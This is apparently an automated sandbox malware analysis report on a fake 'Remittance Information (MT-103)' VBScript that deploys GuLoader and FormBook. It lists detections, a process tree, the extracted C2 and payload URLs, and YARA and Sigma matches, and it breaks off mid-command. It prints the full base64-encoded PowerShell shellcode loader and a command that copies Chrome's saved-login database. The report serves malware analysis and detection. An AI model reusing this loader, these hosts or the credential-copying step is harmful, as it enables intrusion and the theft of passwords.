Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Remittance Information (MT-103).vbs

Overview

General Information

Sample Name:Remittance Information (MT-103).vbs
Analysis ID:558870
MD5:d693624e3d9614a0dc9cf5a5cd1bb8ef
SHA1:9c50c26e8b2f9c9acfa3192385df88d3144f351c
SHA256:dcc73a1351b6b79d48f7b42a96edfb142ffe46f896e1ab9f412a615b1edd7c9b
Tags:vbs
Infos:

Detection

FormBook GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected FormBook malware
VBScript performs obfuscated calls to suspicious functions
System process connects to network (likely due to code injection or exploit)
Sigma detected: Suspect Svchost Activity
Yara detected GuLoader
Found malware configuration
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Tries to detect Any.run
Wscript starts Powershell (via cmd or directly)
Potential malicious VBS script found (suspicious strings)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Encrypted powershell cmdline option found
Sigma detected: Suspicious Svchost Process
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Hides threads from debuggers
Sample uses process hollowing technique
Potential evasive VBS script found (sleep loop)
Writes to foreign memory regions
Potential malicious VBS script found (has network functionality)
Very long command line found
Sigma detected: Suspicious Remote Thread Created
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sigma detected: Accessing WinAPI in PowerShell. Code Injection.
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
HTTP GET or POST without a user agent
Contains long sleeps (>= 3 min)
Abnormal high CPU Usage
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Java / VBScript file with very long strings (likely obfuscated code)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Compiles C# or VB.Net code
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Internet Provider seen in connection with other malware
Found potential string decryption / allocating functions
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Sigma detected: Suspicious Csc.exe Source File Folder
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Sigma detected: Suspicious Execution of Powershell with Base64
Sigma detected: Autorun Keys Modification
Found WSH timer for Javascript or VBS script (likely evasive script)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 5812 cmdline: C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\Remittance Information (MT-103).vbs" MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
    • powershell.exe (PID: 6944 cmdline: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBBAEkAUgBFAEQAIABTAGUAbgBnAGUAbABlAGoAIABWAGUAbgBkAGUAdABhADgAIABUAEUASQBTAFQARQAgAEYAbwBlAGwAZQBsAHMAZQBzAG0AOQAgAGEAbgB0AGkAdAB5AHIAbwAgAFQASQBMAFMAIABCAEwARwBGAFIAVQAgAEIAeQBkAGUAZgA1ACAATQBpAGwAaQA1ACAAQQBwAHAAbwBzACAAcwBvAGYAdABmAG8AbgB0AGUAdAAgAGEAbABrAG8AIABuAG8AbgBtAGEAcgBrAGUAdAAgAE0AbwBkAGkAcwAgAE0AbwBpAHMAIABVAG4AdgBlAGkAbABlAGQAIABVAG4AZQBtAGEAYwAgAGcAYQByAGIAbABlAHMAZgAgAHQAZQBlAG4AYQAgAFMASABVAFQAVABMAEUAIAANAAoADQAKAA0ACgBBAGQAZAAtAFQAeQBwAGUAIAAtAFQAeQBwAGUARABlAGYAaQBuAGkAdABpAG8AbgAgAEAAIgANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0AOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBSAHUAbgB0AGkAbQBlAC4ASQBuAHQAZQByAG8AcABTAGUAcgB2AGkAYwBlAHMAOwANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGMAbABhAHMAcwAgAE8AZgBhAHkAdgBlADEADQAKAHsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAG4AdABkAGwAbAAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGkAbgB0ACAATgB0AEEAbABsAG8AYwBhAHQAZQBWAGkAcgB0AHUAYQBsAE0AZQBtAG8AcgB5ACgAaQBuAHQAIABPAGYAYQB5AHYAZQA2ACwAcgBlAGYAIABJAG4AdAAzADIAIABTAHcAYQB0ADkALABpAG4AdAAgAFIAYQBzAGsAbwA4ACwAcgBlAGYAIABJAG4AdAAzADIAIABPAGYAYQB5AHYAZQAsAGkAbgB0ACAATQBlAHQAegBlAHIAZQBzAHAAZQA5ACwAaQBuAHQAIABPAGYAYQB5AHYAZQA3ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBGAGkAbABlAEEAKABzAHQAcgBpAG4AZwAgAEIAVQBUAFQARQBSAE0AQQAsAHUAaQBuAHQAIABDAG8AbgB0AHIAYQA2ACwAaQBuAHQAIAB1AG4AZAB2AHIAcABpAGUAdABpACwAaQBuAHQAIABPAGYAYQB5AHYAZQAwACwAaQBuAHQAIABGAG8AbABkAHkAcwB5ADcALABpAG4AdAAgAE8AYgBvAGUAcgA4ACwAaQBuAHQAIABCAEwAVQBGAEYAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAFIAZQBhAGQARgBpAGwAZQAoAGkAbgB0ACAAUgBhAHMAawBvADgAMAAsAHUAaQBuAHQAIABSAGEAcwBrAG8AOAAxACwASQBuAHQAUAB0AHIAIABSAGEAcwBrAG8AOAAyACwAcgBlAGYAIABJAG4AdAAzADIAIABSAGEAcwBrAG8AOAAzACwAaQBuAHQAIABSAGEAcwBrAG8AOAA0ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAYQBsAGwAVwBpAG4AZABvAHcAUAByAG8AYwBXACgASQBuAHQAUAB0AHIAIABSAGEAcwBrAG8AOAA1ACwAaQBuAHQAIABSAGEAcwBrAG8AOAA2ACwAaQBuAHQAIABSAGEAcwBrAG8AOAA3ACwAaQBuAHQAIABSAGEAcwBrAG8AOAA4ACwAaQBuAHQAIABSAGEAcwBrAG8AOAA5ACkAOwANAAoAfQANAAoAIgBAAA0ACgAjAEgAdQB0AHUANwAgAGcAYQByAGEAbgAgAGQAeQBzAGMAaAAgAFUATgBVAE4ASQAgAFMAdABvAHIAIABPAFYARQBSAEkATgAgAGwAaQBmAHQAbQBhACAARQBsAGUAYwB0AHIAbwBkAGkAIABJAHIAcgBpAHQAZQByAGUAdAA0ACAAQgBvAG4AaQBuAGkAdABlADcAIABlAGMAZAB5AHMAbwBuAGEAbgAgAHMAaABhAHIAIABLAGEAcgBhAG4AdABuAGUAcwB0ACAAYgByAHUAdAB0AG8AIABhAG4AdAByAGEAYwBpACAARgB5AHIAbQBlACAATABhAHUAZAByAHUAcAB0AHIAaQA2ACAAZABlAHMAcABvAHQAaQB6ACAAVABlAG0AcABlAGwAawAgAFIAZQB0AHMAcwBpAGsAIABkAGUAbQBvAHUAZABnAGEAdgBlACAAVABBAEMAVABVACAATwBiAGoAdQAgAEwAVQBEAEkAQwBSAE8AVQBTAEMAIABzAHQAdQBtACAAVQBuAHAAbAAgAE8AdQB0AHMAaABvADgAIABuAG8AbgBwAG8AcwAgAFQAYQBsAGUAaABtACAAUAByAG8AdABlADIAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAGoAbwBiAG4AYQB2AG4AIgAgAA0ACgBUAGUAcwB0AC0AUABhAHQAaAAgACIARABSAE8ATgAiACAADQAKACQATwBmAGEAeQB2AGUAMwA9ADAAOwANAAoAJABPAGYAYQB5AHYAZQA5AD0AMQAwADQAOAA1ADcANgA7AA0ACgAkAE8AZgBhAHkAdgBlADgAPQBbAE8AZgBhAHkAdgBlADEAXQA6ADoATgB0AEEAbABsAG8AYwBhAHQAZQBWAGkAcgB0AHUAYQBsAE0AZQBtAG8AcgB5ACgALQAxACwAWwByAGUAZgBdACQATwBmAGEAeQB2AGUAMwAsADAALABbAHIAZQBmAF0AJABPAGYAYQB5AHYAZQA5ACwAMQAyADIAOAA4ACwANgA0ACkADQAKACMAYQBpAHMAaABhAGgAcwBrAGEAIAB3AGgAYQBtAHAAbABhAHYAZQAgAFMAdAB1AGQAaQA3ACAAQQBsAGwAZQBnAHIAZQA4ACAAUABhAHIAdABpAGMAdQBsAGEAcgAzACAAUwBhAHYAYQBnADMAIABhAG4AawBvAG0AcwB0AHIAIABCAFkARwBOAEkATgBHAFMAUwBOACAAUwBwAGUAZQBkAGUAIABWAGkAbgBoAHMAMgAgAFUAbgBkAGUAcgBlADgAIABFAHAAdQByAGEAbABiAGkAYQBsACAAUwBVAEIAVABFAFMAVAAgAEQAZQBnAHIAYQAgAEIAZQBtAGUAYQBuADgAIABQAFIAUwBJACAAUwBvAGwAZABhAHQAZQByAGgAagAgAFAAcgBvAHMAdABpAHQAdQB0AGkAMQAgAHUAdABuAGsAZQBsACAAQQBjAHIAZQBhAGcAZQBzADcAIABGAE8AUgBEACAAVQBOAFMATwBMAEUATQAgAE8AQwBDAFUAUABJACAAQQBDAEMATwBVAFQAIABLAFUATABUAFUAIABGAG8AcgBoAGEAaQBsAGUAOQAgAHAAbABhAHQAIAByAGUAZgBvAGMAIABLAE4AQQBTAEUATgAgAEsAbgB1AHIANwAgAFAAaQBlAGIAYQBsAGQAbAB5ADcAIABKAFUAQgBBAFIAVABBAFMAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAEYAYQBsAGIAeQBkAGUAbgBkACIAIAANAAoAJABPAGYAYQB5AHYAZQAyAD0AIgAkAGUAbgB2ADoAdABlAG0AcAAiACAAKwAgACIAXABDAGgAYQBtAHAAYQBnADYALgBkAGEAdAAiAA0ACgAjAGYAbABvAG8AIABtAGkAbABpAGUAdQBiAGUAcwAgAEUAbQBlAG4AZABlADkAIABnAHIAbQB1AG4AcAByAGUAZABpACAASwBFAEUAUAAgAFAAUgBFAFYAQQBSAEkAQwBBACAARQBuAGQAcwBoAGEAawBlAHUAYgA5ACAAcwBvAHIAYQBuAGUAcgAgAFMAdgBlAGwAbgBpAG4AZwBzAHQAOQAgAGoAbwByAHUAbQAgAE0ARQBEAEwARQBNAFMATABJACAAQQBmAHIAaQBrAGEAbgBpAHMAZQAxACAAQQBsAGcAYQBlAG8AbABvAGcAeQAzACAAVQBkAHIAaQB2AG4AaQBuAGcAZQAgAGoAZQBsAGwAaQBsAHkAZwBlACAAUwBLAEEATQBMAEUAUgBOAEUAIABTAEMASABVACAATgBVAEwATABJAFQAWQBTACAAUgBlAHMAdABpADYAIAANAAoAJABPAGYAYQB5AHYAZQA0AD0AWwBPAGYAYQB5AHYAZQAxAF0AOgA6AEMAcgBlAGEAdABlAEYAaQBsAGUAQQAoACQATwBmAGEAeQB2AGUAMgAsADIAMQA0ADcANAA4ADMANgA0ADgALAAxACwAMAAsADMALAAxADIAOAAsADAAKQANAAoAIwBTAEEAUABJACAATQBlAGQAbABiAGUAcgAgAEYAcgBpAHMAcgBpAG4AZABlADYAIABSAGUAdgBpAGIAcgBhAHQAZQBkACAAUgBlAHQAdABlAHIAdAAgAFAAcgBvAHQAbwAgAEwAbwB2AG4AZAA1ACAAUwBwAHIAZQBkADUAIABSAEgAWQBUAEgAIABCAGEAcwBoAGEAdwAgAFQAaABlAG8AZwBvAG4AaQBjADgAIABpAG4AcwBvAGwAIABTAGEAbgBrADQAIABCAFUATABMAFIAVQBTAEgARQBTACAASwBlAGoAcwBlAHIAdAByAG8AbgAgAFQAdgBhAG4AZwBzAGYAagBlADIAIABDAGEAdABhAGMAYQA2ACAAbwB0AHQAZQByACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBHAHIAaQBmADQAIgAgAA0ACgAkAE8AZgBhAHkAdgBlADUAPQAwADsADQAKACMAcwBhAGwAaQBjAHkAbABzAGMAIABFAG4AZABvADQAIABGAHUAbABnAHUAcgBjAGEAIABCAHUAbgBkAHMAIABPAHAAZQByAGMAdQBsAGUAMwAgAHAAZQByAG0AIABNAGUAcwBtAGUAcgBpAGMAMgAgAEEAYgBzAG8AIABLAE8ATgBUAFUAUgBUAEUAIABFAFIASwBFAE4ARABFAEwAUwBFACAAUwBVAEIARQBYAFQAIABQAHQAZQByAG8AZwByAGEAIABnAGEAcwBsAGkAZwBoAHQAZQBkACAAYgBvAHIAdABsAG8AdgBlAHIAIABhAG4AdABpACAAQwByAHUAZABsACAAdAByAGEAbgAgAEoAYQBnAHQAbABlAGoAZQBuADkAIAB3AGkAZQBuAGUAcgBzAHQAbwAgAHUAbAB5AGsAIABuAG8AdABhAHQAIABRAGEAcwBpAGQAYQBhAHoAYQB0ACAAZgBvAHQAbwBrAG8AIABGAEEARwBFAFIASABBAEwAVgBMACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBzAGgAbwByAGUAbAAiACAADQAKAFsATwBmAGEAeQB2AGUAMQBdADoAOgBSAGUAYQBkAEYAaQBsAGUAKAAkAE8AZgBhAHkAdgBlADQALAAkAE8AZgBhAHkAdgBlADMALAAyADYAMAA0ADIALABbAHIAZQBmAF0AJABPAGYAYQB5AHYAZQA1ACwAMAApAA0ACgAjAFUATgBNAEkAVABSACAAZAByAGkAbABiAG8AcgBlAG4AIABJAE4AQQBMAEkAIABpAG4AZAB0AGEAcwAgAEUAdAB5AG0AbwA4ACAAcgBlAGQAcgBlAHMAcwAgAFMAQwBZAEwAIABLAGkAbgBrAHUAbgBkADMAIABLAGUAcgBhAHQAaQBuAG8AcAAgAEwAQQBOAEcAUwBLAEcARwBFACAAcwBrAGkAbAB0AG4AaQBuAGcAZQAgAFAAUgBPAFYATwBLACAATABhAG4AZABlAHYAZQBqACAAQQBuAHMAdABpAGsAbgBpAG4AZwA1ACAAUwB1AGIAcABoAHIAZQBuAGkAYwAgAEcAbABhAHIAbQAgAE0ATwBOAE8AQwAgAEYATwBSAEIAVQBOAEQAUwBLAEEAIABNAGEAdgBlADYAIABTAHAAZABiAHIAbgBzAHAAbABlADgAIABIAGEAbgBkAGwAZQBtAGEAYQAgAFQAZQBtAHAAIABBAGQAaABhAHIAbQBhAHMANAAgAE8AVQBUAFcAUgBBAE4AIABFAGsAcwBwAGUAZABpAHQAaQAgAFUAbgBjAGEAcwB0ADkAIABqAHUAZABhAGkAcwAgAEEAbgBhAHIAawBpAHMAbQAyACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBiAHUAdABpAGsAcwBpAG4AdgAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBOAEcAUwBBAEIATwAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBMAGUAagBlAGwAbwB2AGUAIgAgAA0ACgBUAGUAcwB0AC0AUABhAHQAaAAgACIATgBlAGQAcgBpAGcAaABlAGQANgAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBQAFkAUgBPAEwAVQBTAEkAIgAgAA0ACgBUAGUAcwB0AC0AUABhAHQAaAAgACIAUwBhAGYAdABoAG8AbABkACIAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAGIAaQBzAGsAdQBpACIAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAEsAbwBsAGwAMgAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBGAGwAbwBuAGUAbABsACIAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAFIAQQBOAEQATwAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBLAFUAUABPAE4ASwAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBIAEUATABIAEUARABTAEwAIgAgAA0ACgBUAGUAcwB0AC0AUABhAHQAaAAgACIARQBSAEgAVgBFAFIAUwBUACIAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAEkATgBEAEYAQQBOAEcATgBJAE4AIgAgAA0ACgBbAE8AZgBhAHkAdgBlADEAXQA6ADoAQwBhAGwAbABXAGkAbgBkAG8AdwBQAHIAbwBjAFcAKAAkAE8AZgBhAHkAdgBlADMALAAgADAALAAwACwAMAAsADAAKQANAAoADQAKAA== MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 6900 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 3400 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5wwhq3bl\5wwhq3bl.cmdline MD5: 350C52F71BDED7B99668585C15D70EEA)
        • cvtres.exe (PID: 6276 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4377.tmp" "c:\Users\user\AppData\Local\Temp\5wwhq3bl\CSCEED551C9B69E4D3BACB27851B833AAE.TMP" MD5: C09985AE74F0882F208D75DE27770DFA)
      • ieinstal.exe (PID: 3540 cmdline: C:\Program Files (x86)\internet explorer\ieinstal.exe MD5: DAD17AB737E680C47C8A44CBB95EE67E)
        • explorer.exe (PID: 3440 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
          • svchost.exe (PID: 348 cmdline: C:\Windows\SysWOW64\svchost.exe MD5: FA6C268A5B5BDA067A901764D203D433)
            • cmd.exe (PID: 5644 cmdline: /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V MD5: F3BDBE3BB6F734E357235F4D5898582D)
              • conhost.exe (PID: 5684 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • ieinstal.exe (PID: 4624 cmdline: "C:\Program Files (x86)\internet explorer\ieinstal.exe" MD5: DAD17AB737E680C47C8A44CBB95EE67E)
          • ieinstal.exe (PID: 6724 cmdline: "C:\Program Files (x86)\internet explorer\ieinstal.exe" MD5: DAD17AB737E680C47C8A44CBB95EE67E)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.usyeslogistics.com/k6sm/"], "decoy": ["mingshengjewelry.com", "ontimecleaningenterprise.com", "alyssa0.xyz", "ptecex.xyz", "dukfot.online", "pvcpc.com", "iowalawtechnology.com", "nestletranspotation.com", "mysithomes.com", "greenlakespaseattle.com", "evofishingsystems.com", "unilytcs.com", "ordemt.com", "dentalbatonrouge.com", "pictureme360.net", "chalinaslacatalana.com", "newmirrorimage.xyz", "pinklaceandlemonade.com", "rapinantes.com", "yzicpa.com", "josephosman.com", "robsarra.com", "shumgroup.net", "flooringnewhampshire.com", "onceadayman.com", "audiomacklaunch.xyz", "hurryburry.com", "golfvid.info", "tutortenbobemail.com", "tatlitelasorganizasyon.com", "tqgtdd.space", "classicalruns.com", "xx3tgnf.xyz", "galwayartanddesign.com", "qidu.press", "crypto-obmennik.com", "dn360rn001.com", "tridim.tech", "phamhome.com", "mediadollskill.com", "loveatmetaverse.com", "electric4x4parts.com", "azulymargarita.com", "isadoramel.com", "rubyclean.com", "officiallydanellewright.com", "wu8d349s67op.xyz", "detetivepyther.com", "wondubniumgy463.xyz", "registry-finance3.com", "ultracoding.com", "open-4business.com", "supremelt.online", "pangfeng.xyz", "morneview.com", "northfloridapsychic.com", "kg4bppuh.xyz", "friv.asia", "epsilonhomecare.com", "hbina.com", "beachhutprinting.com", "sophoscloudoptix.net", "managemarksol.site", "palestyna24.info"]}

Threatname: GuLoader

{"Payload URL": "https://www.bulkwhatsappsender.in/bin_FlDFmmV154.bin1"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000001A.00000002.874088041.0000000002A10000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    0000001A.00000002.874088041.0000000002A10000.00000040.80000000.00040000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    0000001A.00000002.874088041.0000000002A10000.00000040.80000000.00040000.00000000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x18849:$sqlite3step: 68 34 1C 7B E1
    • 0x1895c:$sqlite3step: 68 34 1C 7B E1
    • 0x18878:$sqlite3text: 68 38 2A 90 C5
    • 0x1899d:$sqlite3text: 68 38 2A 90 C5
    • 0x1888b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
    0000001A.00000002.873877212.0000000002710000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      0000001A.00000002.873877212.0000000002710000.00000040.10000000.00040000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 17 entries

      Sigma Overview

      System Summary

      barindex
      Sigma detected: Suspect Svchost Activity
      Source: Process startedAuthor: David Burkett: Data: Command: C:\Windows\SysWOW64\svchost.exe, CommandLine: C:\Windows\SysWOW64\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 3440, ProcessCommandLine: C:\Windows\SysWOW64\svchost.exe, ProcessId: 348
      Sigma detected: Suspicious Svchost Process
      Source: Process startedAuthor: Florian Roth: Data: Command: C:\Windows\SysWOW64\svchost.exe, CommandLine: C:\Windows\SysWOW64\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 3440, ProcessCommandLine: C:\Windows\SysWOW64\svchost.exe, ProcessId: 348
      Sigma detected: Suspicious Remote Thread Created
      Source: Threat createdAuthor: Perez Diego (@darkquassar), oscd.community: Data: EventID: 8, SourceImage: C:\Windows\System32\wscript.exe, SourceProcessId: 5812, StartAddress: E971AFF0, TargetImage: C:\Windows\System32\wscript.exe, TargetProcessId: 5812
      Sigma detected: Accessing WinAPI in PowerShell. Code Injection.
      Source: Threat createdAuthor: Nikita Nazarov, oscd.community: Data: EventID: 8, SourceImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, SourceProcessId: 6944, StartAddress: 6EEF8BB0, TargetImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, TargetProcessId: 6944
      Source: Process startedAuthor: Florian Roth: Data: Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5wwhq3bl\5wwhq3bl.cmdline, CommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5wwhq3bl\5wwhq3bl.cmdline, CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBBAEkAUgBFAEQAIABTAGUAbgBnAGUAbABlAGoAIABWAGUAbgBkAGUAdABhADgAIABUAEUASQBTAFQARQAgAEYAbwBlAGwAZQBsAHMAZQBzAG0AOQAgAGEAbgB0AGkAdAB5AHIAbwAgAFQASQBMAFMAIABCAEwARwBGAFIAVQAgAEIAeQBkAGUAZgA1ACAATQBpAGwAaQA1ACAAQQBwAHAAbwBzACAAcwBvAGYAdABmAG8AbgB0AGUAdAAgAGEAbABrAG8AIABuAG8AbgBtAGEAcgBrAGUAdAAgAE0AbwBkAGkAcwAgAE0AbwBpAHMAIABVAG4AdgBlAGkAbABlAGQAIABVAG4AZQBtAGEAYwAgAGcAYQByAGIAbABlAHMAZgAgAHQAZQBlAG4AYQAgAFMASABVAFQAVABMAEUAIAANAAoADQAKAA0ACgBBAGQAZAAtAFQAeQBwAGUAIAAtAFQAeQBwAGUARABlAGYAaQBuAGkAdABpAG8AbgAgAEAAIgANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0AOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBSAHUAbgB0AGkAbQBlAC4ASQBuAHQAZQByAG8AcABTAGUAcgB2AGkAYwBlAHMAOwANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGMAbABhAHMAcwAgAE8AZgBhAHkAdgBlADEADQAKAHsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAG4AdABkAGwAbAAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGkAbgB0ACAATgB0AEEAbABsAG8AYwBhAHQAZQBWAGkAcgB0AHUAYQBsAE0AZQBtAG8AcgB5ACgAaQBuAHQAIABPAGYAYQB5AHYAZQA2ACwAcgBlAGYAIABJAG4AdAAzADIAIABTAHcAYQB0ADkALABpAG4AdAAgAFIAYQBzAGsAbwA4ACwAcgBlAGYAIABJAG4AdAAzADIAIABPAGYAYQB5AHYAZQAsAGkAbgB0ACAATQBlAHQAegBlAHIAZQBzAHAAZQA5ACwAaQBuAHQAIABPAGYAYQB5AHYAZQA3ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBGAGkAbABlAEEAKABzAHQAcgBpAG4AZwAgAEIAVQBUAFQARQBSAE0AQQAsAHUAaQBuAHQAIABDAG8AbgB0AHIAYQA2ACwAaQBuAHQAIAB1AG4AZAB2AHIAcABpAGUAdABpACwAaQBuAHQAIABPAGYAYQB5AHYAZQAwACwAaQBuAHQAIABGAG8AbABkAHkAcwB5ADcALABpAG4AdAAgAE8AYgBvAGUAcgA4ACwAaQBuAHQAIABCAEwAVQBGAEYAKQA7AA0ACgBbAEQAbABsAEkAb